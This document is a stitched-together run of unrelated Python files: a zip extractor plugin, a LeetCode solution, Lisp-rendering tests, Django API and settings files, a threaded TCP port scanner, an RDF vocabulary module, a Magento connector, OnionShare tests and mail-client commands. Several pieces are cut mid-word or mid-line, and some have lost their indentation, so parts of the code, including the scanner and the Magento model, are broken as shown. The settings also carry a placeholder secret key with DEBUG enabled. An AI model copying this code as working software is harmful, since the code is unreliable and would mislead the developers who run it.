            # Was a bare `except:`; missing file, bad JSON or missing keys.
            return False
|
# -*- coding: utf-8 -*-
from __future__ import with_statement
import os
import sys
import zipfile
from pyload.plugin.Extractor import Extractor, ArchiveError, CRCError, PasswordError
from pyload.utils import fs_encode
class UnZip(Extractor):
    # Python 2 plugin: note the `except X, e` syntax below.
    __name = "UnZip"
    __type = "extractor"
    __version = "1.12"
    __description = """Zip extractor plugin"""
    __license = "GPLv3"
    __authors = [("Walter Purcaro", "vuolter@gmail.com")]

    # Archive extensions this extractor claims to handle.
    EXTENSIONS = [".zip", ".zip64"]

    NAME = __name__.rsplit('.', 1)[1]
    VERSION = "(python %s.%s.%s)" % (sys.version_info[0], sys.version_info[1], sys.version_info[2])

    @classmethod
    def isUsable(cls):
        # zipfile's context-manager support requires Python >= 2.6.
        return sys.version_info[:2] >= (2, 6)

    def list(self, password=None):
        # Return the member names of the archive.
        with zipfile.ZipFile(fs_encode(self.filename), 'r', allowZip64=True) as z:
            z.setpassword(password)
            return z.namelist()

    def check(self, password):
        # No cheap probe available; verify()/extract() do the real checks.
        pass

    def verify(self):
        # NOTE(review): this method always raises -- CRCError when testzip()
        # finds a corrupt member, PasswordError otherwise.  Presumably it is
        # only invoked when a password problem is already suspected; confirm
        # against the Extractor base class contract.
        with zipfile.ZipFile(fs_encode(self.filename), 'r', allowZip64=True) as z:
            badfile = z.testzip()
            if badfile:
                raise CRCError(badfile)
            else:
                raise PasswordError

    def extract(self, password=None):
        # Extract all members to self.out; on success record the member
        # names in self.files.
        try:
            with zipfile.ZipFile(fs_encode(self.filename), 'r', allowZip64=True) as z:
                z.setpassword(password)
                badfile = z.testzip()
                if badfile:
                    raise CRCError(badfile)
                else:
                    z.extractall(self.out)
        except (zipfile.BadZipfile, zipfile.LargeZipFile), e:
            raise ArchiveError(e)
        except RuntimeError, e:
            # NOTE(review): `"encrypted" in e` relies on Python 2 exception
            # iteration over e.args; `"encrypted" in str(e)` looks like what
            # was intended -- confirm before changing.
            if "encrypted" in e:
                raise PasswordError
            else:
                raise ArchiveError(e)
        else:
            self.files = z.namelist()
|
# https://leetcode.com/problems/linked-lis | t-cycle-ii/
from ListNode import ListNode
class Solution(object):
    """Find the node at which a cycle begins in a singly linked list.

    Implements Floyd's tortoise-and-hare algorithm in O(1) extra space:
    phase 1 detects a meeting point inside the cycle (if any); phase 2
    walks one pointer from the head and one from the meeting point at the
    same speed -- they meet exactly at the cycle's entry node.
    """

    def detectCycle(self, head):
        """Return the node where the cycle starts, or None if acyclic."""
        # `==`/`!=` comparisons are kept (rather than `is`) to preserve the
        # original's comparison semantics on ListNode instances.
        slow = head
        fast = head
        # Phase 1: advance at 1x and 2x speed until the pointers meet
        # (cycle present) or the fast pointer runs off the end.
        while fast != None and fast.next != None:
            slow = slow.next
            fast = fast.next.next
            if slow == fast:
                # Phase 2: restart one walker from the head; stepping both
                # walkers once per iteration makes them meet at the entry.
                walker = head
                while walker != fast:
                    walker = walker.next
                    fast = fast.next
                return walker
        # Fast pointer fell off the list -- no cycle.
        return None
from pycse.lisp im | port *
def test_symbol():
    """A Symbol renders as its bare name."""
    assert Symbol('setf').lisp == 'setf'

def test_quote():
    """Quote prefixes the rendered form with a single quote."""
    assert Quote('setf').lisp == "'setf"

def test_sharpquote():
    """SharpQuote renders the #' function-quote reader macro."""
    assert SharpQuote('setf').lisp == "#'setf"

def test_cons():
    """Cons renders as a dotted pair."""
    assert Cons('a', 3).lisp == '("a" . 3)'

def test_Alist():
    """Alist pairs up a flat [k1, v1, k2, v2] list into dotted pairs."""
    assert Alist(["a", 1, "b", 2]).lisp == '(("a" . 1) ("b" . 2))'

def test_vector():
    """Vector renders with square brackets."""
    assert Vector(["a", 1, 3]).lisp == '["a" 1 3]'

def test_Comma():
    """Comma renders the , unquote reader macro."""
    assert Comma(Symbol("setf")).lisp == ',setf'

def test_splice():
    """Splice renders the ,@ splice reader macro."""
    assert Splice([1, 3]).lisp == ',@(1 3)'

def test_backquote():
    """Backquote renders the ` quasiquote reader macro."""
    assert Backquote([Symbol("a"), 1]).lisp == '`(a 1)'

def test_comment():
    """Comment renders a ; line comment."""
    assert Comment(Symbol("test")).lisp == '; test'
|
from django.conf.urls.defaults import *
from tastypie.api import Api
#from tastytools.api import Api
from base.api import BaseResource
from bcmon.api import PlayoutResource as BcmonPlayoutResource
from bcmon.api import ChannelResource as BcmonChannelResource
from alibrary.api import MediaResource, ReleaseResource, ArtistResource, LabelResource, SimplePlaylistResource, PlaylistResource, PlaylistItemPlaylistResource
from importer.api import ImportResource, ImportFileResource
from exporter.api import ExportResource, ExportItemResource
from abcast.api import StationResource, ChannelResource, JingleResource, JingleSetResource, EmissionResource
from abcast.api import BaseResource as AbcastBaseResource
from istats.api import StatsResource
from fluent_comments.api import CommentResource
# Single tastypie Api instance; every app's resources are registered on it
# so they are all exposed under one API root.
api = Api()
# base
api.register(BaseResource())
# bcmon
api.register(BcmonPlayoutResource())
api.register(BcmonChannelResource())
# library
api.register(MediaResource())
api.register(ReleaseResource())
api.register(ArtistResource())
api.register(LabelResource())
api.register(SimplePlaylistResource())
api.register(PlaylistResource())
api.register(PlaylistItemPlaylistResource())
# importer
api.register(ImportResource())
api.register(ImportFileResource())
# exporter
api.register(ExportResource())
api.register(ExportItemResource())
# abcast
api.register(AbcastBaseResource())
api.register(StationResource())
api.register(ChannelResource())
api.register(JingleResource())
api.register(JingleSetResource())
### scheduler
api.register(EmissionResource())
# comment
api.register(CommentResource())
# server stats
api.register(StatsResource())
# The URL wiring below is kept for reference; the project presumably includes
# api.urls from its root urlconf instead.
"""
urlpatterns = patterns('',
    (r'^', include(api.urls)),
)
"""
import socket
import sys
import threading
try:
from Queue import Queue, Empty
except:
from queue import Queue, Empty
from collections import OrderedDict
from . import parseintset
# Default maximum number of concurrent scanner threads.
DEFAULT_THREAD_LIMIT = 200
# Status strings reported for each scanned port.
CLOSED_STATUS = 'closed'
OPEN_STATUS = 'open'
# Python 3 has no `unicode` builtin; alias it so isinstance checks work
# on both major versions.
if sys.version_info.major >= 3:
    unicode = str
class Scanner(threading.Thread):
    """Worker thread: pulls (host, port) pairs from input_queue, attempts a
    TCP connect with the configured timeout, and pushes
    (host, port, status) results onto output_queue."""

    def __init__(self, input_queue, output_queue, timeout=5):
        threading.Thread.__init__(self)
        # These are the scan queues
        self.input_queue = input_queue
        self.output_queue = output_queue
        # Polled by run(); stop_running() flips it so the thread can exit.
        self.keep_running = True
        # Per-connection socket timeout in seconds.
        self.timeout = timeout

    def run(self):
        # This loop will exit when the input_queue generates an exception because all of the threads
        # are complete
        while self.keep_running:
            try:
                host, port = self.input_queue.get(timeout=5)
            except Empty:
                # Nothing queued right now; loop back and re-check keep_running.
                continue
            # Make the socket for performing the scan
            sock_instance = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock_instance.settimeout(self.timeout)
            try:
                # Connect to the host via TCP
                sock_instance.connect((host, port))
            except socket.error:
                # Note that it is in the closed state
                # NOTE(review): the socket is only close()d on the open path
                # below -- the refused/timeout path appears to leak the fd
                # until GC; confirm and consider a finally-close.
                self.output_queue.put((host, port, CLOSED_STATUS))
            else:
                # Note that it is in the open state
                self.output_queue.put((host, port, OPEN_STATUS))
                sock_instance.close()
            self.input_queue.task_done()
            # NOTE(review): task_done() on the *output* queue right after
            # put() balances Queue.join() bookkeeping but marks the item
            # done before any consumer has processed it; confirm intent.
            self.output_queue.task_done()

    def stop_running(self):
        # Request cooperative shutdown; run() exits on its next loop check.
        self.keep_running = False
def port_scan(host, ports, thread_count=DEFAULT_THREAD_LIMIT, callback=None, timeout=5):
    """Scan TCP ports on `host` concurrently.

    :param host: hostname or IP address to scan
    :param ports: iterable of port numbers, or a spec string handled by
        parseintset.parseIntSet (presumably e.g. "80,443,8000-8080")
    :param thread_count: maximum number of scanner threads to spawn
    :param callback: optional fn(host, port, status) invoked per result
    :param timeout: per-connection timeout in seconds
    :return: list of OrderedDicts with keys 'dest', 'port', 'status'
    """
    # Parse the ports if necessary
    if isinstance(ports, (str, unicode)):
        parsed_ports = parseintset.parseIntSet(ports)
    else:
        parsed_ports = ports
    # Setup the queues
    to_scan = Queue()
    scanned = Queue()
    # Prepare the scanners.  These monitor the input queue for new things to
    # scan, scan them, and put the results in the output queue.
    # BUG FIX: the pool was sized with len(ports), which is the *character*
    # count when `ports` is a spec string; size from the parsed ports instead.
    scanners = [Scanner(to_scan, scanned, timeout)
                for _ in range(min(thread_count, len(parsed_ports)))]
    for scanner in scanners:
        scanner.start()
    # Create the list of host/port pairs to scan and enqueue them
    host_ports = [(host, port) for port in parsed_ports]
    for host_port in host_ports:
        to_scan.put(host_port)
    # Statuses observed so far, keyed by (host, port)
    results = {}
    # This will contain the resulting data
    data = []
    for host, port in host_ports:
        while (host, port) not in results:
            # Get the next completed scan; blocks until one is available
            scanned_host, scanned_port, scan_status = scanned.get()
            # Log that we performed the scan
            results[(scanned_host, scanned_port)] = scan_status
            # Append the data.  Built from a list of pairs so the key order
            # is deterministic (an OrderedDict built from a dict literal
            # does not guarantee insertion order on Python < 3.7).
            data.append(OrderedDict([
                ('dest', scanned_host),
                ('port', 'TCP\\' + str(scanned_port)),
                ('status', scan_status),
            ]))
            # Run the callback if one is present
            if callback is not None:
                callback(scanned_host, scanned_port, scan_status)
    # Stop the threads
    for scanner in scanners:
        scanner.stop_running()
    return data
|
"""
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
This file is part of the Smart Developer Hub Project:
http://www.smartdeveloperhub.org
Center for Open Middleware
http://www.centeropenmiddleware.com/
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Copyright (C) 2015 Center for Open Middleware.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
"" | "
import StringIO
import urlparse
from rdflib import Graph, RDF
from rdflib.namespace import OWL
from rdflib.plugins.parsers.notation3 import BadSyntax
import agora.fountain.vocab.schema as sch
__author__ = 'Fernando Serena'
class VocabularyException(Exception):
    """Base class for all vocabulary-management errors in this module."""
    pass

class DuplicateVocabulary(VocabularyException):
    """Raised when adding a vocabulary whose id is already registered."""
    pass

class VocabularyNotFound(VocabularyException):
    """Raised when an OWL document declares no owl:Ontology URI."""
    pass

class UnknownVocabulary(VocabularyException):
    """Raised when operating on a vocabulary id that is not registered."""
    pass
def __load_owl(owl):
    """Parse a serialized ontology and extract its identifying metadata.

    :param owl: ontology document as a string (turtle or RDF/XML)
    :return: tuple (vid, uri, graph, imports) -- vid is a short id taken
        from a non-empty namespace prefix bound to the ontology URI, or the
        last path segment of that URI; uri is the owl:Ontology subject;
        graph is the parsed rdflib Graph; imports iterates owl:imports
        objects
    :raises VocabularyException: if neither format yields any triples
    :raises VocabularyNotFound: if no owl:Ontology subject is declared
    """
    owl_g = Graph()
    # Try the supported serializations in order; stop at the first success.
    for f in ['turtle', 'xml']:
        try:
            owl_g.parse(source=StringIO.StringIO(owl), format=f)
            break
        except SyntaxError:
            pass
    if not len(owl_g):
        raise VocabularyException()
    try:
        uri = list(owl_g.subjects(RDF.type, OWL.Ontology)).pop()
        # Prefer a non-empty namespace prefix bound to the ontology URI...
        vid = [p for (p, u) in owl_g.namespaces() if uri in u and p != '']
        imports = owl_g.objects(uri, OWL.imports)
        if not len(vid):
            # ...falling back to the last path segment of the URI.
            vid = urlparse.urlparse(uri).path.split('/')[-1]
        else:
            vid = vid.pop()
        return vid, uri, owl_g, imports
    except IndexError:
        raise VocabularyNotFound()
def add_vocabulary(owl):
    """Register a new vocabulary and, recursively, its owl:imports.

    :param owl: serialized ontology (turtle or RDF/XML string)
    :return: list of vocabulary ids that were added
    :raises DuplicateVocabulary: if the root vocabulary is already registered
        (duplicates among the *imports* are only logged, not raised)
    """
    vid, uri, owl_g, imports = __load_owl(owl)
    if vid in sch.contexts():
        raise DuplicateVocabulary('Vocabulary already contained')
    sch.add_context(vid, owl_g)
    vids = [vid]
    # TODO: Import referenced ontologies
    for im_uri in imports:
        print im_uri
        im_g = Graph()
        # Fetch each imported ontology, trying turtle then the default format.
        try:
            im_g.load(im_uri, format='turtle')
        except BadSyntax:
            try:
                im_g.load(im_uri)
            except BadSyntax:
                print 'bad syntax in {}'.format(im_uri)
        try:
            # Recurse on the serialized import; collect any ids it adds.
            child_vids = add_vocabulary(im_g.serialize(format='turtle'))
            vids.extend(child_vids)
        except DuplicateVocabulary, e:
            print 'already added'
        except VocabularyNotFound, e:
            print 'uri not found for {}'.format(im_uri)
        except Exception, e:
            print e.message
    return vids
def update_vocabulary(vid, owl):
    """Replace the stored graph of an already-registered vocabulary.

    :param vid: identifier of the vocabulary to update
    :param owl: serialized ontology to parse and store
    :raises Exception: if the document's own id does not match `vid`
    :raises UnknownVocabulary: if `vid` is not registered
    """
    parsed_vid, _, graph, _ = __load_owl(owl)
    if parsed_vid != vid:
        raise Exception("Identifiers don't match")
    if vid not in sch.contexts():
        raise UnknownVocabulary('Vocabulary id is not known')
    sch.update_context(vid, graph)
def delete_vocabulary(vid):
    """Remove a registered vocabulary.

    :param vid: identifier of the vocabulary to remove
    :raises UnknownVocabulary: if `vid` is not registered
    """
    if vid in sch.contexts():
        sch.remove_context(vid)
    else:
        raise UnknownVocabulary('Vocabulary id is not known')
def get_vocabularies():
    """Return the ids of all registered vocabularies.

    :return: the schema contexts collection (one entry per vocabulary)
    """
    return sch.contexts()
def get_vocabulary(vid):
    """Serialize a registered vocabulary as turtle.

    :param vid: vocabulary id
    :return: turtle serialization of the stored graph
    """
    return sch.get_context(vid).serialize(format='turtle')
|
medelta
from openerp.osv import fields, orm
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT
from openerp.tools.translate import _
from openerp.addons.connector.session import ConnectorSession
from openerp.addons.connector.connector import ConnectorUnit
from openerp.addons.connector.unit.mapper import (mapping,
only_create,
ImportMapper
)
from .unit.backend_adapter import GenericAdapter
from .unit.import_synchronizer import (import_batch,
DirectBatchImport,
MagentoImportSynchronizer,
AddCheckpoint,
)
from .partner import partner_import_batch
from .sale import sale_order_import_batch
from .backend import magento
from .connector import add_checkpoint
_logger = logging.getLogger(__name__)

# Safety margin applied around incremental-import cutoff dates -- presumably
# to avoid missing records committed near the cutoff; confirm against the
# import scheduling code that consumes it.
IMPORT_DELTA_BUFFER = 30  # seconds
class magento_backend(orm.Model):
_name = 'magento.backend'
_description = 'Magento Backend'
_inherit = 'connector.backend'
_backend_type = 'magento'
    def select_versions(self, cr, uid, context=None):
        """ Available versions in the backend.
        Can be inherited to add custom versions. Using this method
        to add a version from an ``_inherit`` does not constrain
        to redefine the ``version`` field in the ``_inherit`` model.

        :return: list of (value, label) tuples for the selection field
        """
        return [('1.7', '1.7')]
    def _select_versions(self, cr, uid, context=None):
        """ Available versions in the backend.
        If you want to add a version, do not override this
        method, but ``select_version``.

        :return: list of (value, label) tuples for the 'version' field
        """
        return self.select_versions(cr, uid, context=context)
    def _get_stock_field_id(self, cr, uid, context=None):
        # Default for 'product_stock_field_id': the 'virtual_available'
        # field of product.product.
        field_ids = self.pool.get('ir.model.fields').search(
            cr, uid,
            [('model', '=', 'product.product'),
             ('name', '=', 'virtual_available')],
            context=context)
        return field_ids[0]
_columns = {
'version': fields.selection(
_select_versions,
string='Version',
required=True),
'location': fields.char(
'Location',
required=True,
help="Url to magento application"),
'admin_location': fields.char('Admin Location'),
'use_custom_api_path': fields.boolean(
'Custom Api Path',
help="The default API path is '/index.php/api/xmlrpc'. "
"Check this box if you use a custom API path, in that case, "
"the location has to be completed with the custom API path "),
'username': fields.char(
'Username',
help="Webservice user"),
'password': fields.char(
'Password',
help="Webservice password"),
'use_auth_basic': fields.boolean(
'Use HTTP Auth Basic',
help="Use a Basic Access Authentication for the API. "
"The Magento server could be configured to restrict access "
"using a HTTP authentication based on a username and "
"a password."),
'auth_basic_username': fields.char(
'Basic Auth. Username',
help="Basic access authentication web server side username"),
'auth_basic_password': fields.char(
'Basic Auth. Password',
help="Basic access authentication web server side password"),
'sale_prefix': fields.char(
'Sale Prefix',
help="A prefix put before the name of imported sales orders.\n"
"For instance, if the prefix is 'mag-', the sales "
"order 100000692 in Magento, will be named 'mag-100000692' "
"in OpenERP."),
'warehouse_id': fields.many2one('stock.warehouse',
'Warehouse',
required=True,
help='Warehouse used to compute the '
'stock quantities.'),
'website_ids': fields.one2many(
'magento.website', 'backend_id',
string='Website', readonly=True),
'default_lang_id': fields.many2one(
'res.lang',
'Default Language',
help="If a default language is selected, the records "
"will be imported in the translation of this language.\n"
"Note that a similar configuration exists "
"for each storeview."),
'default_category_id': fields.many2one(
'product.category',
string='Default Product Category',
help='If a default category is selected, products imported '
'without a category will be linked to it.'),
# add a field `auto_activate` -> activate a cron
'import_products_from_date': fields.datetime(
'Import products from date'),
'import_categories_from_date': fields.datetime(
'Import categories from date'),
'catalog_price_tax_included': fields.boolean('Prices include tax'),
'product_stock_field_id': fields.many2one(
'ir.model.fields',
string='Stock Field',
domain="[('model', 'in', ['product.product', 'product.template']),"
" ('ttype', '=', 'float')]",
help="Choose the field of the product which will be used for "
"stock inventory updates.\nIf empty, Quantity Available "
"is used."),
'product_binding_ids': fields.one2many('magento.product.product',
'backend_id',
string='Magento Products',
readonly=True),
}
_defaults = {
'product_stock_field_id': _get_stock_field_id,
'use_custom_api_path': False,
'use_auth_basic': False,
}
_sql_constraints = [
('sale_prefix_uniq', 'unique(sale_prefix)',
"A backend with the same sale prefix already exists")
]
    def check_magento_structure(self, cr, uid, ids, context=None):
        """ Used in each data import.
        Verify if a website exists for each backend before starting the import.

        :return: True
        """
        for backend_id in ids:
            website_ids = self.pool['magento.website'].search(
                cr, uid, [('backend_id', '=', backend_id)], context=context)
            # No website bound yet -> metadata was never synchronized for
            # this backend; do it now so dependent imports can proceed.
            if not website_ids:
                self.synchronize_metadata(cr, uid, backend_id, context=context)
        return True
    def synchronize_metadata(self, cr, uid, ids, context=None):
        """Import websites, stores and storeviews for the given backends.

        :param ids: a single backend id or an iterable of ids
        :return: True
        """
        if not hasattr(ids, '__iter__'):
            ids = [ids]
        session = ConnectorSession(cr, uid, context=context)
        for backend_id in ids:
            for model in ('magento.website',
                          'magento.store',
                          'magento.storeview'):
                # import directly, do not delay because this
                # is a fast operation, a direct return is fine
                # and it is simpler to import them sequentially
                import_batch(session, model, backend_id)
        return True
    def import_partners(self, cr, uid, ids, context=None):
        """ Import partners from all websites """
        if not hasattr(ids, '__iter__'):
            ids = [ids]
        # Make sure websites exist (synchronizes metadata if needed).
        self.check_magento_structure(cr, uid, ids, context=context)
        for backend in self.browse(cr, uid, ids, context=context):
            for website in backend.website_ids:
                website.import_partners()
        return True
def import_sale_orders(self, cr, uid, ids, context=None):
""" Import sale orders from all store views """
if not hasattr(ids, '__iter__'):
ids = [ids]
storeview_obj = self.pool.get('magento.storeview')
storeview_ids = storeview_obj.search(cr, uid,
|
"""
OnionShare | https://onionshare.org/
Copyright (C) 2014 Micah Lee <micah@micahflee.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is dis | tributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see | <http://www.gnu.org/licenses/>.
"""
from onionshare import web
from nose import with_setup
def test_generate_slug_length():
    """generates a 26-character slug"""
    # presumably 16 random bytes -> 26 base32 characters once padding is
    # stripped; confirm against onionshare.web's slug generation.
    assert len(web.slug) == 26
def test_generate_slug_characters():
    """generates a base32-encoded slug"""
    def is_b32(string):
        # BUG FIX: the previous alphabet ("01234556789abcdefghijklmnopqrstuvwxyz")
        # was not base32 -- it contained a duplicated '5' and accepted the
        # digits 0, 1, 8 and 9, which never occur in base32 output, so the
        # test was vacuously permissive.  RFC 4648 base32 uses A-Z and 2-7;
        # the original test only accepted lowercase, so the slug is
        # presumably lowercased -- confirm against onionshare.web.
        b32_alphabet = "abcdefghijklmnopqrstuvwxyz234567"
        return all(char in b32_alphabet for char in string)
    assert is_b32(web.slug)
|
import sys
from os.path import join, abspath, dirname
# PATH vars
# Helpers building absolute paths relative to this file / the project root.
here = lambda *x: join(abspath(dirname(__file__)), *x)
PROJECT_ROOT = here("..")
root = lambda *x: join(abspath(PROJECT_ROOT), *x)
sys.path.insert(0, root('apps'))
ADMINS = (
    ('Maxime Lapointe', 'maxx@themaxx.ca'),
)
MANAGERS = ADMINS
SHELL_PLUS = 'ipython'
# SECURITY WARNING: keep the secret key used in production secret!
# Placeholder value -- presumably overridden by .local/.production imports
# at the bottom of this file; confirm before deploying.
SECRET_KEY = 'CHANGE THIS!!!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
    'django_admin_bootstrapped',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django_extensions',
    'www',
)
PROJECT_APPS = ()
INSTALLED_APPS += PROJECT_APPS
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'lapare.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'lapare.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        # NOTE(review): relative sqlite path -- resolved against the process
        # CWD, not the project root; confirm this is intentional.
        'NAME': '../www_lapare_ca.db',
        'USER': '',
        'PASSWORD': '',
        'HOST': '',
        'PORT': '',
    }
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'fr-CA'
TIME_ZONE = 'America/Montreal'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
MEDIA_ROOT = root('assets', 'uploads')
MEDIA_URL = '/media/'
# Additional locations of static files
STATICFILES_DIRS = (
    root('assets'),
)
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
STATICFILES_STORAGE = ('django.contrib.staticfiles.storage.'
                       'ManifestStaticFilesStorage')
TEMPLATE_DIRS = (
    root('templates'),
)
# .local.py overrides all the common settings.
try:
    from .local import *
except ImportError:
    from .production import *
# importing test settings file if necessary
if len(sys.argv) > 1 and 'test' in sys.argv[1]:
    from .testing import *
|
command to open
:type cmd: str or list of str
:param all: pipe all, not only selected message
:type all: bool
:param separately: call command once per message
:type separately: bool
:param background: do not suspend the interface
:type background: bool
:param notify_stdout: display command\'s stdout as notification message
:type notify_stdout: bool
:param shell: let the shell interpret the command
:type shell: bool
'raw': message content as is,
'decoded': message content, decoded quoted printable,
'id': message ids, separated by newlines,
'filepath': paths to message files on disk
:type format: str
:param add_tags: add 'Tags' header to the message
:type add_tags: bool
:param noop_msg: error notification to show if `cmd` is empty
:type noop_msg: str
:param confirm_msg: confirmation question to ask (continues directly if
unset)
:type confirm_msg: str
:param done_msg: notification message to show upon success
:type done_msg: str
"""
Command.__init__(self, **kwargs)
if isinstance(cmd, unicode):
cmd = split_commandstring(cmd)
self.cmd = cmd
self.whole_thread = all
self.separately = separately
self.background = background
self.shell = shell
self.notify_stdout = notify_stdout
self.output_format = format
self.add_tags = add_tags
self.noop_msg = noop_msg
self.confirm_msg = confirm_msg
self.done_msg = done_msg
@inlineCallbacks
def apply(self, ui):
    """Pipe the selected message(s) into `self.cmd`.

    Builds one string per message (or a single joined string) in the
    format chosen at construction time and feeds it to the command's
    stdin, either in the background or with the urwid screen suspended.
    """
    # abort if command unset
    if not self.cmd:
        ui.notify(self.noop_msg, priority='error')
        return
    # get messages to pipe
    if self.whole_thread:
        thread = ui.current_buffer.get_selected_thread()
        if not thread:
            return
        to_print = thread.get_messages().keys()
    else:
        to_print = [ui.current_buffer.get_selected_message()]
    # ask for confirmation if needed
    if self.confirm_msg:
        if (yield ui.choice(self.confirm_msg, select='yes',
                            cancel='no')) == 'no':
            return
    # prepare message sources
    pipestrings = []
    separator = '\n\n'
    logging.debug('PIPETO format')
    logging.debug(self.output_format)
    if self.output_format == 'id':
        pipestrings = [e.get_message_id() for e in to_print]
        separator = '\n'
    elif self.output_format == 'filepath':
        pipestrings = [e.get_filename() for e in to_print]
        separator = '\n'
    else:
        # 'raw' and 'decoded' both need the full mail object
        for msg in to_print:
            mail = msg.get_email()
            if self.add_tags:
                mail['Tags'] = encode_header('Tags',
                                             ', '.join(msg.get_tags()))
            if self.output_format == 'raw':
                pipestrings.append(mail.as_string())
            elif self.output_format == 'decoded':
                headertext = extract_headers(mail)
                bodytext = extract_body(mail)
                msgtext = '%s\n\n%s' % (headertext, bodytext)
                # NOTE(review): Python 2 style bytes handling — confirm
                # encoding behaviour if this ever runs on Python 3.
                pipestrings.append(msgtext.encode('utf-8'))
    if not self.separately:
        pipestrings = [separator.join(pipestrings)]
    if self.shell:
        # hand the whole command line to the shell as one string
        self.cmd = [' '.join(self.cmd)]
    # do teh monkey
    for mail in pipestrings:
        if self.background:
            logging.debug('call in background: %s' % str(self.cmd))
            proc = subprocess.Popen(self.cmd,
                                    shell=True, stdin=subprocess.PIPE,
                                    stdout=subprocess.PIPE,
                                    stderr=subprocess.PIPE)
            out, err = proc.communicate(mail)
            if self.notify_stdout:
                ui.notify(out)
        else:
            # suspend urwid so the command may use the terminal
            logging.debug('stop urwid screen')
            ui.mainloop.screen.stop()
            logging.debug('call: %s' % str(self.cmd))
            # if proc.stdout is defined later calls to communicate
            # seem to be non-blocking!
            proc = subprocess.Popen(self.cmd, shell=True,
                                    stdin=subprocess.PIPE,
                                    # stdout=subprocess.PIPE,
                                    stderr=subprocess.PIPE)
            out, err = proc.communicate(mail)
            logging.debug('start urwid screen')
            ui.mainloop.screen.start()
        if err:
            ui.notify(err, priority='error')
            return
    # display 'done' message
    if self.done_msg:
        ui.notify(self.done_msg)
@registerCommand(MODE, 'remove', arguments=[
    (['--all'], {'action': 'store_true', 'help': 'remove whole thread'})])
class RemoveCommand(Command):
    """remove message(s) from the index"""
    repeatable = True

    def __init__(self, all=False, **kwargs):
        """
        :param all: remove all messages from thread, not just selected one
        :type all: bool
        """
        Command.__init__(self, **kwargs)
        self.all = all

    @inlineCallbacks
    def apply(self, ui):
        buf = ui.current_buffer
        # collect the messages to delete plus the matching notifications
        if self.all:
            thread = buf.get_selected_thread()
            thread_id = thread.get_thread_id()
            victims = thread.get_messages().keys()
            confirm_msg = 'remove all messages in thread?'
            ok_msg = 'removed all messages in thread: %s' % thread_id
        else:
            selected = buf.get_selected_message()
            victims = [selected]
            confirm_msg = 'remove selected message?'
            ok_msg = 'removed message: %s' % selected.get_message_id()
        # bail out unless the user explicitly confirms
        answer = yield ui.choice(confirm_msg, select='yes', cancel='no')
        if answer == 'no':
            return

        def refresh_and_report():
            # runs once the index update has completed
            buf.rebuild()
            ui.notify(ok_msg)

        for victim in victims:
            ui.dbman.remove_message(victim, afterwards=refresh_and_report)
        ui.apply_command(FlushCommand())
@registerCommand(MODE, 'print', arguments=[
| (['--all'], {'action': 'store_true', 'help': 'print all messages'}),
(['--raw'], {'action': 'store_true', 'help': 'pass raw mail string'}),
(['--separately'], {'action': | 'store_true',
'help': 'call print command once for each message'}),
(['--add_tags'], {'action': 'store_true',
'help': 'add \'Tags\' header to the message'}),
],
)
class PrintCommand(PipeCommand):
"""print message(s)"""
repeatable = True
def __init__(self, all=False, separately=False, raw=False, add_tags=False,
**kwargs):
"""
:param all: print all, not only selected messages
:type all: bool
:param separately: call print command once per message
:type separately: bool
:param raw: pipe raw message string to print command
:type raw: bool
:param add_tags: add 'Tags' header to the message
:type add_tags: bool
"""
# get print command
cmd = settings.get('print_cmd') or ''
# set up notification strings
if all:
confirm_msg = 'print all messages in thread?'
ok_msg = 'printed thread using %s' % cmd
else:
confirm_msg = 'print selected message?'
ok_msg = 'printed message using %s' % cmd
# no print cmd set
noop_msg = 'no print command specified. Set "print_cmd" in the '\
'global section.'
PipeCommand.__init__(self, [cmd], all=all, separately=separately,
back |
# -*- coding: utf-8 -*-
#
# This file is part of Karesansui.
#
# Copyright (C) 2009-2012 HDE, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
